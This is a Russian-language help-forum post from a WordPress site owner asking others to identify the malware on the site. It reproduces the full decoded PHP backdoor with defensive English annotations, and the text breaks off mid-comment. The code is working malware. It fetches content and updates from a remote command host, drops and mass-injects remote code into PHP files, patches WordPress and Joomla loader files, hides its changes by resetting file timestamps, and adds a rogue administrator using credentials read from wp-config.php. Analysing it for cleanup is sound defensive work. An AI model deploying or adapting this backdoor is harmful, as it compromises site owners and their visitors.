Чем заражен мой сайт? Можете ли вы идентифицировать этот код? [закрыто]
У меня есть сайт на WordPress, заражённый вредоносным ПО, и я пытаюсь выяснить, что это за заражение, чтобы закрыть бэкдор, который оно использует.
Оно заражает такие файлы, как index.php, и создаёт множество php-файлов со случайными именами. Код, который внедряется в php-файлы, приведён ниже.
Я пробовал Wordfence и несколько других плагинов, чтобы удалить заражение, но оно возвращается. Имеющиеся у меня резервные копии тоже заражены. Я уже готов перейти на новый хостинг и собрать сайт заново с нуля.
Я использовал декодер php, и он дал мне такой результат: PHP DECODED
МОЙ САЙТ: skyartmedia.com
<?php /*
 * REVIEW NOTE - defensive annotation only; every code byte below is unchanged.
 *
 * Sample: obfuscated PHP backdoor / remote-content client, self-reported version 1.0.10.
 * Strings hide behind \xNN and \NNN escapes and integers are octal sums, e.g.
 * error_reporting(-071+-0125+0155- -041) is error_reporting(0). The prologue also turns
 * display_errors, error_log and log_errors off and raises the time limits to 300 s.
 * No branch checks a password, token or client address: any client that can
 * reach this URL can drive every action below.
 *
 * Remote host: client_version("3104709758") is a hand-rolled long2ip(); by hand
 * arithmetic that is 185.14.28.126 (verify with long2ip before using it as an
 * indicator). Endpoints: /get.php with ?content, ?createdoor, ?update, ?getback,
 * ?spider, ?getlinkofdoor, ?getfilename. $server_addr (104.236.16.95) is assigned but
 * not read anywhere in this file.
 *
 * Request parameters handled: gen, get=template, testpage=wpgopost|joomlagopost,
 * v, upd, ws, wsall, z, sz, h, sc, addwpuser; anything else serves remote content.
 *
 * Triage notes that follow from the code:
 *  - almost every write is followed by touch() with the previous mtime, so
 *    modification times cannot be used to scope the infection; compare files
 *    against known-good copies or checksums instead;
 *  - the top-level code below asks the remote host for a fragment ($liiijj) and
 *    reports this file's own URL while doing so; this happens on every request.
 */header("C\x6fntent\x2dType: text/html; charset=utf-8");error_reporting(-071+-0125+0155- -041);@ini_set("d\151splay_e\x72rors","Off");@ini_set("error_\154og",null);@ini_set("log_errors",065+051- -061-0217);@ini_set("max_input_time",0217- -0235);@ini_set("max_\145xecution_time",0674+-0123+-075);@set_time_limit(0271- -0163);@ob_end_flush();iii();$server_addr="1\0604.236.16.95";$ljiljll="1.0.10";$lllijjllij="h";$lljjjiliji="/get\056php";$lil="/get.\x70h\160?content";$lllj="/get.php?created\x6for";$ljlj="/get.php?update";$lljljj="/get.\160hp?getback";$ljljjjlij="/get.\160\x68p?spider";$lll=client_version("310470\07175\x38");$liljl="http://".$lll.$lljjjiliji;$lljl="http://".$lll;$lijii=$lljl.$lil;$ljjj=$lljl.$lllj;$lljijljlil=$lljl.$ljlj;$ll=$lljl.$lljljj;$ljljiilj=$lljl.$ljljjjlij;$liil=preg_replace("\x23^\057#i","",$_SERVER["S\x43RIPT_NAME"]);$ljlijli=$_SERVER["\x48TTP_HOST"];$lljjiliijj=$_SERVER["SCR\x49PT_NAME"];if($_SERVER["S\105RVER_POR\124"]=="443"):$liliijilji="http\x73://";else:$liliijilji="http://";endif;$lliljlillij=$liliijilji.$ljlijli.$lljjiliijj;$liiijj=ij($liljl."?getlinkofdoor\x3d".urlencode($lliljlillij),$lll,$lljjjiliji."?getlinkofdoor=".urlencode($lliljlillij),$llilijjl="no");/* ?gen - registration: guesses the CMS from wp-config.php or components/com_users/users.php in this or up to three parent directories, reports host, script name, version and CMS to the remote "createdoor" endpoint, copies the mtime of the first older *.php in this directory onto this file, and prints the reply. */if(isset($_GET["gen"])):$lljllljijii=array("wp-co\156fig.php","../w\x70-c\157n\146ig.p\x68p","../../wp-c\x6fnfig.php","../../../wp\x2dcon\146ig.php");$llli=array("components/\143om_u\x73ers/users\x2ephp","../components/\x63om_\x75sers\057user\x73.ph\160","../../\143om\160onen\x74s/com_users/u\x73\x65rs.php","../../../components/com_use\x72s/users\056php");$liiiliiijj="\x6eone";foreach($llli as$lj):if(file_exists($lj)):$liiiliiijj="\152\157omla";endif;endforeach;foreach($lljllljijii 
as$liji):if(file_exists($liji)):$liiiliiijj="wp";endif;endforeach;if(isset($_GET["serve\x72id"])):$llijjiijj=$_GET["server\x69d"];$lljl=$ljjj."&gendomain=".$ljlijli."&filename=".$liil."&vl=".$lllijjllij."&v=".$ljiljll."&serv\x65ri\144=".$llijjiijj."&cms=".$liiiliiijj;$lijjijjiij=$lllj."&g\x65\156\144omain=".$ljlijli."&filename=".$liil."&vl=".$lllijjllij."&v=".$ljiljll."&se\x72verid=".$llijjiijj."&cms=".$liiiliiijj;else:$lljl=$ljjj."&gendomain=".$ljlijli."&filename=".$liil."&vl\075".$lllijjllij."&v=".$ljiljll."&cms=".$liiiliiijj;$lijjijjiij=$lllj."\046gendomain=".$ljlijli."&filena\155e=".$liil."&vl=".$lllijjllij."&v=".$ljiljll."&cms=".$liiiliiijj;endif;$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="\171e\163");$ljiiiiiijl=filemtime(__FILE__);foreach(glob("*.php") as$ljjjljjjiil):$ljilli=filemtime($ljjjljjjiil);if($ljilli<$ljiiiiiijl):@touch(__FILE__,$ljilli);break;endif;endforeach;echo$ljijll;exit;/* ?get=template - climbs up to MAX_LEVELS_UP (7) directories looking for wp-config.php or configuration.php. It chmods a core loader file to 0666, writes a copy with an extra require_once of this script guarded by ?testpage=wpgopost / joomlagopost, requests the site once through that hook (see ili()), then writes the original bytes back and restores the mtime. The original mode is read but never restored in the visible code, so loader files left at 0666 are an indicator; if the script dies during the request the hook stays on disk, so search core files for "testpage". */elseif($_GET["\147et"]=="t\x65mplate"):define("M\101X_LEVELS_UP",0257- -0441+-0711);$ljiji=(05-050- -043);do{foreach(glob("*") as$liililij):if(strpos($liililij,"wp\x2dconfig.\x70\x68p")!==false):define("P\114ATFORM","WO\x52DPRESS");$lljllljijii=array("wp-blog-header.php","wp-l\x6fad.php","wp-settings.p\150p","wp\x2dc\x6fnfig.php");for($lijil=(-0277- -061- -0216);$lijil<(0703+0655-0353-01201);$lijil++):$liljjli=$lljllljijii[$lijil];$liljj=filemtime($liljjli);$liilliiljli=sprintf("%o",fileperms($liljjli));@chmod($liljjli,01452-02235+02371+-0720);if(is_writable($liljjli)):$lljiilijj=file_get_contents($liljjli);switch($liljjli):case "wp-load.php":$lijlj=preg_replace("/require_once(.*)\x41BSPATH(.*)'( \051?wp-config\134.ph\160(.*);/i","requ\x69re_once( ABSP\101\124H . 
'wp-config.php' );".PHP_EOL."if(i\163set\050\044_\x47ET['testpage']) && \044_\107ET['testpag\145']=\075'wpgo\160ost'){\162equire_\157nce( \101BSPATH .\040'".$liil."' );}",$lljiilijj);break;case "wp-\x62log\x2dheader.php":$lijlj=preg_replace("\057require_once(.*)wp-load\x5c.ph\160(.*\x29;/i","re\161uire_onc\145( \144irname(__FI\x4cE__) . '/wp-\x6coad.ph\160' );".PHP_EOL."if(isset(\x24\x5fGET['t\x65stpage']) && \x24_G\x45T['\164estpage']=='wp\147\157post'){re\x71\x75i\x72e_once( A\102S\x50ATH . '".$liil."' );\x7d",$lljiilijj);break;case "wp-config\x2ephp":$lijlj=preg_replace("/require_once\050.*)wp-settings\134.php(.*);/i","require_once(ABSPATH . \x27wp\x2dsetting\163.php');".PHP_EOL."if(isset(\044_GE\124['testpage']) &&\040\044_GE\124['testpage']=='wpgopos\164'){require\137once( ABSPATH . '".$liil."' );}",$lljiilijj);break;case "wp-settings.php":$lijlj=preg_replace("/require(\056*)pluggabl\x65-de\160recated\x5c.php(.*);/i","require( ABSP\101TH .\x20WPINC . '/pluggable-\x64\145precated\x2ephp' );".PHP_EOL."i\146\050isse\x74\x28\x24_GET['te\x73tpage']\051\040&& \044_GET['testpage']=\075'\167pgopost'){require_once( A\x42SPA\124H . 
'".$liil."' \051;}",$lljiilijj);break;endswitch;$llijljlj="wpgopos\x74";ili($lijlj,$liljjli,$ljlijli,$llijljlj,$liliijilji);file_put_contents($liljjli,$lljiilijj);@touch($liljjli,$liljj);continue (02);else:continue;endif;endfor;elseif(strpos($liililij,"configurat\x69on.\160hp")!==false):define("PL\x41\124F\x4fRM","JOOMLA");$ljjllil=array("index.php","conf\151\x67ur\141tion.\x70hp","inc\x6cudes/framework.p\x68p","\154ibraries/c\x6ds.php","l\x69braries/classmap.php","libraries/fof/includ\x65.php");for($lijil=(0252-0252);$lijil<(0541-0533);$lijil++):$liljjli=$ljjllil[$lijil];$liljj=filemtime($liljjli);$liilliiljli=sprintf("%o",fileperms($liljjli));@chmod($liljjli,01160+0434+0407+-01335);if(is_writable($liljjli)):$lljiilijj=file_get_contents($liljjli);switch($liljjli):case "index.php":$lijlj=preg_replace("/r\145qu\151r\x65_once JPATH_BA\123E(.*)in\143lu\144es\134/fr\141mework.ph\x70';/i","require_on\x63e JP\x41TH_BASE \x2e '/includes/fra\155ework.php';".PHP_EOL."if(\151sset(\x24_G\x45T['tes\164page']) && \x24_GET\133'te\163tpa\x67\145']==\x27jooml\x61gopost')\x7brequire_o\156ce J\x50ATH_BASE . \x27/".$liil."';\x7d",$lljiilijj);break;case "configuration.php":$lijlj=preg_replace("/\x5c<\134?php\057i","\x3c?php".PHP_EOL."\151f(\044_GET\133'testpage']=='jooml\x61gopost'){requi\x72e_once JPATH_BASE .\x20'/".$liil."'\073}",$lljiilijj);break;case "includes/f\x72am\x65\x77ork.ph\x70":$lijlj=preg_replace("/require_once JP\101TH_LIBRAR\x49ES(.*)cms.php';/i","r\x65qu\151re_once \x4aPATH_LIBRARIES . '/cms.\160hp';".PHP_EOL."if(i\x73set(\x24_GET['test\160age']) \x26&\040\044_GET['testpag\x65']=='joomlago\x70ost'\051{require_once JPA\x54H_BASE . '/".$liil."'\x3b}",$lljiilijj);break;case "\154ibraries/cms.php":$lijlj=preg_replace("/require_once\x20JPATH_\x4cIBRARIES(.*)classmap.php';/i","requir\x65_on\143e JPAT\110_LIBRARIES . 
'/cla\163smap\056php';".PHP_EOL."\x69f(i\163set(\x24_G\x45T['\164estpage'])\x20&& \x24_GET['\x74estpag\145\x27]=='joomlagopost'){requ\x69r\x65\137onc\145 J\120\101TH_BA\x53E\040. '/".$liil."';\x7d",$lljiilijj);break;case "libraries/clas\163map.p\x68p":$lijlj=preg_replace("/\134\x3c\x5c?php/i","<?p\x68\160".PHP_EOL."if(\x24_\107ET['te\163tpage']\x3d=\x27joomla\x67op\157st'){require_o\156ce JPAT\x48_BASE \x2e '\x2f".$liil."';}",$lljiilijj);break;case "l\151braries/fof/i\x6eclude.php":$lijlj=preg_replace("/\134\074\134?php/i","<?php".PHP_EOL."if(\044_GET[\047\164estpage\x27]=='joomlagopos\x74'){require_once JPATH_BA\x53E . '/".$liil."';}",$lljiilijj);break;endswitch;$llijljlj="jooml\141\x67opost";ili($lijlj,$liljjli,$ljlijli,$llijljlj,$liliijilji);file_put_contents($liljjli,$lljiilijj);@touch($liljjli,$liljj);continue (02);else:continue;endif;endfor;endif;endforeach;/* iji(): prepends the remote reply fetched at the top of the script ($liiijj) to every other writable *.php in the current directory. */iji($liiijj);if(!defined("P\x4c\101\124FORM")):chdir("..");$ljiji++;endif;}while(!defined("PLATFORM")&&$ljiji<MAX_LEVELS_UP);if(!defined("PLATFORM")):exit("Unknown 
platf\157rm!");endif;/* ?testpage=wpgopost - only meaningful when this file was pulled in through the loader hook (it calls WordPress functions it does not define): publishes a placeholder post, fetches its permalink, swaps URL and slug for HEREISURL / HEREISSLUG markers, prints the page and force-deletes the post. */elseif($_GET["testpage"]=="w\160gopost"):$llii="abcdefghi\152kl\x6dno\x70";$ljjillljlll=str_shuffle($llii);$lilll=array("post_ti\164le"=>"HEREISH1TAG","po\163t_\156ame"=>$ljjillljlll,"post_content"=>"HEREISCONTENT","p\157st_status"=>"publish","post_c\x61tegory"=>array());$liiijli=wp_insert_post($lilll,true);$ljijjii=get_permalink($liiijli);$lijjijjiij=preg_replace("#http://(.\052)\057|h\x74tps://(\x2e*)/#","",$ljijjii);$lijjijjiij="\x2f".$lijjijjiij;$ljijll=ij($ljijjii,$ljlijli,$lijjijjiij,$llilijjl="no");$ljijll=str_replace($ljijjii,"HEREIS\125R\x4c",$ljijll);$ljijll=str_replace($ljjillljlll,"HERE\x49\123SLUG",$ljijll);echo$ljijll;if(!wp_delete_post($liiijli,true)):wp_delete_post($liiijli,true);endif;exit;/* ?testpage=joomlagopost - Joomla counterpart: inserts a placeholder article through iljiji(), fetches it, deletes the row from #__content, then rewrites the title, og:description meta and h2 heading of the captured page to placeholder markers before printing it. */elseif($_GET["testpage"]=="joomlagopost"):$li=explode("/",$_SERVER["SERV\105R_NAME"].$_SERVER["RE\x51\x55EST_URI"]);unset($li[count($li)-(0417+-0255+-0141)]);$ljiiliij=iljiji("HEREI\x53TITLE","","HEREISCONTENT");$ljiiliij=explode(":",$ljiiliij);$liljiijil="HEREIS\x54IT\114E";if(is_array($ljiiliij)):$liijljl=trim($ljiiliij[01051+-0165- -0254-01137]);$llliilll=trim($ljiiliij[0541+-060+-0461]);$lllljjjj=$liliijilji.trim(implode("/",$li),"/")."/index.php/?option=com_content&view\x3dartic\154\x65\x26id=".$llliilll;$ljijll=ij($lllljjjj,$ljlijli,$lllljjjj,$llilijjl="\156o");$ljijll=preg_replace("/<title>(.*)<\134/title>/iUm","<ti\164\154e>".$liljiijil."</\x74i\164\x6ce>",$ljijll);$llljjjijli=JFactory::getDbo();$lljlii=$llljjjijli->getQuery(true);$lljlii->delete($llljjjijli->quoteName("#__con\164ent"))->where(array($llljjjijli->quoteName("i\x64")."=".$llliilll));$llljjjijli->setQuery($lljlii);$liij=$llljjjijli->query();if(!empty($ljijll)&&stripos($ljijll,"\x48EREI\123CONTENT")):$ljijll=str_ireplace("content\075\042HE\122\105\111SCONTENT","content=\042",$ljijll);$ljijll=str_ireplace("cont\x65nt=\042 HEREISCONTENT","conten\x74=\042",$ljijll);$ljijll=preg_replace("/<me\164a pro\x70erty=[\134\042']{1}og:descrip\164ion\x5b\x5c\042']{\x31} 
co\x6eten\x74=[\134\042\047]{1}.*[\134\x22']{1}\x5cs?\x5c/>/iUs","",$ljijll);$ljlijlliii="|(<\x68\x32\076.*HE\x52EISTITLE.*\074/h2>)|i\x55s";preg_match_all($ljlijlliii,$ljijll,$llljii);if(!empty($llljii[-0230-0474-0132+01057][-060- -060])):$ljijll=str_ireplace($llljii[-0426- -0427][-0155+0155],"<h\061>HEREISH1TAG</\1501>",$ljijll);endif;endif;echo$ljijll;exit;endif;/* ?v - prints the client version string. */elseif(isset($_GET["v"])):die($ljiljll);/* ?upd - self-update: downloads a replacement body from the remote "update" endpoint (host taken from ?source when present) and overwrites this file, keeping the old mtime. */elseif(isset($_GET["\x75pd"])):if(isset($_GET["source"])&&$_GET["source"]!=null):$lll=client_version($_GET["s\157\x75r\143\x65"]);$lljl="http://".$lll.$ljlj."&vl=".$lllijjllij."&upd";else:$lljl=$lljijljlil."&vl=".$lllijjllij."&upd";endif;$lijjijjiij=$ljlj."&vl=".$lllijjllij."&upd";$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="no");if($ljijll==null):die("cant load ne\x77 client");endif;$liljj=filemtime(__FILE__);if(!is_writable(__FILE__)):chmod(__FILE__,"0644");file_put_contents(__FILE__,$ljijll);@touch(__FILE__,$liljj);if(!chmod(__FILE__,"06\0644")):die("cant set rights");endif;endif;file_put_contents(__FILE__,$ljijll);@touch(__FILE__,$liljj);if(!is_writable(__FILE__)):die("c\x6cient not writab\x6ce");endif;file_put_contents(__FILE__,$ljijll);@touch(__FILE__,$liljj);exit;/* ?ws - file drop: walks up to seven directory levels below the current directory (paths containing "akismet" are skipped), asks the remote host for file names, then writes one remotely supplied body into a randomly chosen writable directory and prints its URL. */elseif(isset($_GET["ws"])):if(isset($_GET["s\x6furc\x65"])&&$_GET["source"]!=null):$lll=client_version($_GET["source"]);$liiljj="http://".$lll.$lljljj."&vl=".$lllijjllij."&upd";else:$liiljj=$ll."&ws\x3d".$_GET["ws"];endif;$liillljilji=$lljljj."&ws=".$_GET["ws"];$ljilijii=null;$lljlj=(0317-01074+0301+0263);$liijijlilj="^_^";for($lijil=(-063- -064);$lijil<=$lljlj;$lijil++):if($lijil==(0474+01024-01517)):list($ljjli,$ljilijii)=ijl($liijijlilj,$ljilijii);foreach($ljjli as$ljiiiil):if(strstr($ljiiiil,"akismet")):continue;endif;$lljlll[]=$ljiiiil;endforeach;else:foreach($lljlll as$ljjij):list($ljjli,$ljilijii)=ijl($ljjij,$ljilijii);foreach($ljjli 
as$ljiiiil):if(strstr($ljiiiil,"akismet")):continue;endif;$lljlll[]=$ljiiiil;$lljlll=array_values(array_unique($lljlll));endforeach;endforeach;endif;endfor;$liljiijiilj=ii($ljilijii,$liljl,$lll,$lljjjiliji,$lijjllljli="all");shuffle($lljlll);foreach($lljlll as$liijijlilj):if(is_writable($liijijlilj)):shuffle($liljiijiilj);$liililij=$liijijlilj.DIRECTORY_SEPARATOR.$liljiijiilj[0152+0142+-0314];if(!file_exists($liililij)):$ljijll=ij($liiljj,$lll,$liillljilji,$llilijjl="n\157");if($ljijll==null):die("cant\x20get tx\164 file");endif;if(file_put_contents($liililij,$ljijll)):$lljijli=explode("/",$_SERVER["\x53CRI\x50T_\x4eAME"],-(0372-0371));$lljjiliijj=implode("/",$lljijli)."/".$liililij;$llliiii=$liliijilji.$ljlijli.$lljjiliijj;echo$llliiii;exit;endif;endif;endif;endforeach;die("can\047\x74 w\x72ite \x66ile");/* ?wsall - same walk, but queues a new file for every writable directory and writes remotely supplied bodies (reply format "label:-:-:body") until its counter reaches 10, printing "label||url" pairs. */elseif(isset($_GET["wsall"])):ini_set("\x6dax_execution_time",0154+035- -0104+-0315);set_time_limit(-0505+0505);$ljilijii=null;if(isset($_GET["s\157urce"])&&$_GET["sourc\x65"]!=null):$lll=client_version($_GET["\163ource"]);$liiljj="ht\x74p://".$lll.$lljljj."&bdr&counte\162=\x30&vl=".$lllijjllij;$liljl="http://".$lll.$lljjjiliji;else:$liiljj=$ll."&b\144\x72&counte\x72=0&vl=".$lllijjllij;endif;$liillljilji=$lljljj."&\x62dr&counter=0&vl=".$lllijjllij;$lljlj=(-0243+0252);$liijijlilj="^_^";for($lijil=(0315-0314);$lijil<=$lljlj;$lijil++):if($lijil==(047+-046)):list($ljjli,$ljilijii)=ijl($liijijlilj,$ljilijii);foreach($ljjli as$ljiiiil):if(strstr($ljiiiil,"akismet")):continue;endif;$lljlll[]=$ljiiiil;endforeach;else:foreach($lljlll as$ljjij):list($ljjli,$ljilijii)=ijl($ljjij,$ljilijii);foreach($ljjli as$ljiiiil):if(strstr($ljiiiil,"akis\155et")):continue;endif;$lljlll[]=$ljiiiil;$lljlll=array_values(array_unique($lljlll));endforeach;endforeach;endif;endfor;$liljiijiilj=ii($ljilijii,$liljl,$lll,$lljjjiliji,$lijjllljli="al\154");foreach($lljlll 
as$liijijlilj):if(is_writable($liijijlilj)):shuffle($liljiijiilj);$liililij=$liijijlilj.DIRECTORY_SEPARATOR.$liljiijiilj[0651-0161+-0470];if(!file_exists($liililij)):$lijiilllili[]=$liililij;endif;endif;endforeach;if(count($lijiilllili)=="0"):echo"nothing to do\x20\150ere";endif;shuffle($lijiilllili);$ljiji=(-045+-0162- -0227);foreach($lijiilllili as$liililij):if($ljiji<(-0241-0107+0134+0226)):$ljiji++;$ljijll=ij($liiljj,$lll,$liillljilji,$llilijjl="no");$lij=explode(":-:-:",$ljijll,-0444-0265- -0733);$ljjlijjil=$lij[0714+-01251+0335];$lilljjii=$lij[061-060];$lljijli=explode("/",$_SERVER["SCRIPT_NA\x4dE"],-(-0111+0270-01040- -0662));$lljjiliijj=implode("/",$lljijli)."\057".$liililij;$llliiii=$liliijilji.$ljlijli.$lljjiliijj;$ljiji--;if(file_put_contents($liililij,$lilljjii)):$ljiji++;if($ljiji=="\0610"):echo$ljjlijjil."|\174".$llliiii;elseif($ljiji<(0750- -0411-01347)):echo$ljjlijjil."||".$llliiii."::";endif;else:$ljiji--;endif;else:continue;endif;endforeach;exit;/* ?z - liveness probe ("im okey"); ?sz - asks the remote host for its own ?z reply and relays it. */elseif(isset($_GET["z"])):echo"im o\153ey";exit;elseif(isset($_GET["sz"])):$lljl=$liljl."?z";$lijjijjiij=$lljjjiliji."?z";$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");echo$ljijll;exit;/* ?h - prints the contents of .htaccess in the current directory. */elseif(isset($_GET["h"])):$ljjlijiij=".htacces\x73";if(file_exists($ljjlijiij)):echo file_get_contents($ljjlijiij);endif;exit;/* ?sc - mass injection: optionally unlinks this file first (?d), downloads a code fragment plus two lists ("baddirs", "filestoinc") from the remote "spider" endpoint, climbs from DOCUMENT_ROOT through readable parent directories, and hands the resulting tree to iiljij(). */elseif(isset($_GET["sc"])):@ini_set("max_execu\164ion_time",023232+023305+023416+-046536);@set_time_limit(024132-0513);if(isset($_GET["d"])):unlink(__FILE__);endif;$llijjiijj=md5(__FILE__.time());$lljl=$ljljiilj."&g\145tcode&v\154\075".$lllijjllij."&serverid=".$llijjiijj;$lijjijjiij=$ljljjjlij."&g\x65tc\x6fde&v\154=".$lllijjllij."&s\x65rverid=".$llijjiijj;$lljliijljl=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");if($lljliijljl=="nocodetoinsert"):die("nocodet\x6finsert");endif;chdir($_SERVER["DOCUMENT_RO\x4fT"]);$ljiljji=getcwd();if(isset($_GET["i"])&&$_GET["i"]):$lijil=$_GET["i"];else:$lijil="4";endif;for($lijil=(0154+-0143+-011);$lijil<=(-0431-0345-0575- 
-01577);$lijil++):if(is_readable("..")):chdir("..");$ljiljji=getcwd();else:continue;endif;endfor;$lijiii=ijj($lll,$ljljiilj,$ljljjjlij,$ljjlijjil="baddi\x72s");$lllljllj=ijj($lll,$ljljiilj,$ljljjjlij,$ljjlijjil="filestoin\x63");iiljij($ljiljji,$lljliijljl,$lllljllj,$lijiii);exit;/* ?addwpuser - rogue administrator: takes id, username and password from the query string, locates wp-config.php between this script and DOCUMENT_ROOT, regex-extracts DB_NAME / DB_USER / DB_PASSWORD / DB_HOST and the table prefix, and inserts rows into <prefix>users and <prefix>usermeta directly. Fixed values to search for in the database: user_email wpsupport@wpress.com, user_nicename Support, display_name "Support Account", user_registered 2018-05-04 12:33:09, capabilities administrator, user level 10. Relies on the mysql_* API, which was removed in PHP 7.0. */elseif(isset($_GET["addwpus\x65r"])):$llliilll=$_GET["id"];$lijlliill=$_GET["username"];$lli=md5($_GET["password"]);$liijiij=str_replace($_SERVER["DOCUMENT_ROOT"],"",$_SERVER["\123CRIPT_F\x49L\x45NAME"]);$ljiijij=null;$liijljlj=substr_count($liijiij,DIRECTORY_SEPARATOR);if($liijljlj>(-0466-0422+01111)):$lljlililjl=explode($liijiij,DIRECTORY_SEPARATOR);while(substr_count($liijiij,DIRECTORY_SEPARATOR)>(-0517+-0576+-0527- -02045)):$lljlililjl=explode(DIRECTORY_SEPARATOR,$liijiij,-(-01307- -0755- -0333));$liijiij=implode($lljlililjl,DIRECTORY_SEPARATOR);$liiji[]=$_SERVER["\x44OCUM\x45NT_ROOT"].$liijiij.DIRECTORY_SEPARATOR."wp\x2dconf\x69g\x2ephp";endwhile;$liiji[]=$_SERVER["DO\x43UMENT_RO\117T"].DIRECTORY_SEPARATOR."wp-config.\160h\160";else:$liiji[]=$_SERVER["DOCUMENT_R\117\117T"].DIRECTORY_SEPARATOR."wp-config.php";endif;foreach($liiji as$lljllljl):if(file_exists($lljllljl)):$ljiijij=$lljllljl;break;endif;endforeach;if($ljiijij==null):die("\156o wp");else:echo$ljiijij;$ljiijij=file_get_contents($ljiijij);preg_match("/define\134(\x5c'DB\137NA\115E\x5c', \134'(.\052)\x5c'\x5c)\134;\057msU",$ljiijij,$lljijj);preg_match("/define\134(\x5c'DB\137US\x45R\x5c', \x5c\x27(.*)\134'\134)\x5c;/msU",$ljiijij,$lii);preg_match("/define\x5c(\134'\104B_PASSWORD\x5c', \x5c'(.*)\x5c'\x5c\x29\134;/m\163U",$ljiijij,$ljlliillilj);preg_match("/define\134(\x5c'DB_HOST\134', \x5c'\050.*)\134'\134)\x5c;/msU",$ljiijij,$liljjjiij);preg_match("/.*prefix \x5c= \134'(.\052)\x5c'\134;/msU",$ljiijij,$lljjjjj);$ljjiiillli=$lljjjjj[-032+-0147+0202]."users";$lljjlllll=$lljjjjj[017+0223+-0241]."usermeta";$ljijil=mysql_connect($liljjjiij[0133+0310-0767+0325],$lii[063- -0554+-0636],$ljlliillilj[-0237- 
-0240]);mysql_select_db($lljijj[0335-0334]);$lljlii="SELECT\x20CO\125\x4eT(*) FROM ".$ljjiiillli." WHERE \111D=\x27".$llliilll."'";$liliijjiijj=mysql_query($lljlii);if(mysql_result($liliijjiijj,053-053)==(0152+-024+045-0172)):echo"user exists";else:$lllilj="I\x4eSERT I\116\x54O ".$ljjiiillli."\x20(\x60\x49D`,`user_logi\156`,\x60user_pa\163\x73`,`user_nic\x65name`,\140user_email`\x2c`user\137url`,\x60user_registered`,`use\x72_a\143t\151va\164ion_k\x65y`,`user_\163tatus`,`displ\x61\x79_name`)\x20VALUES ('".$llliilll."','".$lijlliill."','".$lli."','Support\x27,'wps\165pport\100wpres\x73.com'\x2c\x27','2018-05-04 \0612:33:09','','0','Sup\x70ort A\143coun\164');";$ljiiiji="IN\x53ERT INTO ".$lljjlllll." (`umeta_id`,`user_id`,`meta_key`,`meta_value`) VALUE\x53 (NULL,'".$llliilll."','wp_capabil\x69ties','a\x3a1:{\x73:13:\x22ad\155inist\x72at\157\162\x22;s:1:\0421\042;}'),(NU\114\x4c,'".$llliilll."','wp_user_le\x76el','10');";$llj=mysql_query($lllilj);$lliijiill=mysql_query($ljiiiji);echo"use\162 inser\x74ed";endif;mysql_close($ljijil);endif;/* No recognised parameter - visitor-facing path: negotiates a cookie name/value with the remote "content" endpoint, then prints whatever that endpoint returns for this host. */else:if(preg_match("#^www\134.#",$ljlijli)):$ljlijli=preg_replace("#^www\x5c.#",$ljlijli);endif;$lljl=$lijii."&vl=".$lllijjllij."&v=".$ljiljll."&\144omain=".$ljlijli."\x26getcookie";$lijjijjiij=$lil."&vl\075".$lllijjllij."&v\x3d".$ljiljll."&domai\156=".$ljlijli."\x26getco\157ki\145";$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");if($ljijll!="don\164show\143ookies"):$lljjillii=explode(":",$ljijll);$lljiiij=$lljjillii[01127- -0516-01645];$lljljlijjj=$lljjillii[-0206+0207];if(!$_COOKIE[$lljiiij]):$lji="yes";if(setcookie($lljiiij,$lljljlijjj,time()+(07673-0653)*(062+-032),"\x2f",$ljlijli)):$lji="no";endif;else:$lji="n\x6f";endif;else:$lji="no";endif;$lljl=$lijii."&vl=".$lllijjllij."&v=".$ljiljll."&cookiebot=".$lji;$lijjijjiij=$lil."&vl=".$lllijjllij."&v=".$ljiljll."&c\x6fokiebot=".$lji;$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");echo$ljijll;exit;endif;/* iiljij(dir, code, names, skip): recursive injector. For each directory entry whose name equals an entry of names (entries listed in skip are ignored), makes the file writable (chmod 0644) if needed, skips it when it already contains the literal "$incode", otherwise prepends code and restores the mtime. The "$incode" test suggests the injected fragment carries that token - TODO confirm against an infected file before using it as a search pattern. */function 
iiljij($ljiljji,$lljliijljl,$lllljllj,$lijiii){foreach(scandir($ljiljji) as$liililij):il();if($liililij=="."||$liililij==".."):continue;endif;if(in_array($liililij,$lijiii)):continue;endif;foreach($lllljllj as$ljll):if($liililij==$ljll):$ljjiliiji=$ljiljji.DIRECTORY_SEPARATOR.$liililij;if(!is_writable($ljjiliiji)):if(!@chmod($ljjiliiji,01351-0505)):continue;else:$ljjljl=file_get_contents($ljjiliiji);if(preg_match("/\x5c\x24incode/",$ljjljl)):continue;endif;$liljj=filemtime($ljjiliiji);$ljjljl=$lljliijljl.$ljjljl;file_put_contents($ljjiliiji,$ljjljl);@touch($ljjiliiji,$liljj);echo"included: ".$ljjiliiji."\074br>";endif;else:$ljjljl=file_get_contents($ljjiliiji);if(preg_match("/\134\044incode/",$ljjljl)):continue;endif;$liljj=filemtime($ljjiliiji);$ljjljl=$lljliijljl.$ljjljl;file_put_contents($ljjiliiji,$ljjljl);@touch($ljjiliiji,$liljj);echo"included: ".$ljjiliiji."<br>";endif;endif;endforeach;$liijijlilj=$ljiljji.DIRECTORY_SEPARATOR.$liililij;if(is_dir($liijijlilj)):iiljij($liijijlilj,$lljliijljl,$lllljllj,$lijiii);endif;endforeach;}/* il(): emits an HTML comment holding 700 "w" characters; called once per directory entry, presumably to keep output flowing during long walks. */function il(){echo"<!-\x2d ";echo str_repeat("wwwwwww",0111+0414+046+-0427);echo" \055->";}/* iji(prefix): in the current directory, inserts prefix in front of the first PHP open tag of every writable *.php except this file, restoring each mtime. */function iji($liiijj){foreach(glob("*.php") as$liijli):if($liijli==basename(__FILE__)||is_writable($liijli)==false):continue;endif;$liljj=filemtime($liijli);$lijlj=file_get_contents($liijli);$lijlj=preg_replace("/\074\x5c\x3fphp\x7c<\134?/\x69",$liiijj."<?php",$lijlj,060- -0254+-0333);file_put_contents($liijli,$lijlj);@touch($liijli,$liljj);endforeach;}/* ili(): writes the patched loader text to disk, requests <scheme><host>/?testpage=<marker> through ij() and prints the response. The last two parameters are unused. */function ili($lijlj,$liljjli,$ljlijli,$llijljlj,$liliijilji,$lljllljllji=true,$llil=null){file_put_contents($liljjli,$lijlj);$ljljiljjl=$liliijilji.$ljlijli."/?\x74estpa\x67e=".$llijljlj;$lijjijjiij="/?testpa\147e=".$llijljlj;$ljijll=ij($ljljiljjl,$ljlijli,$lijjijjiij,$llilijjl="n\157");echo$ljijll;}/* iljiji(title, intro, body): inserts a row into 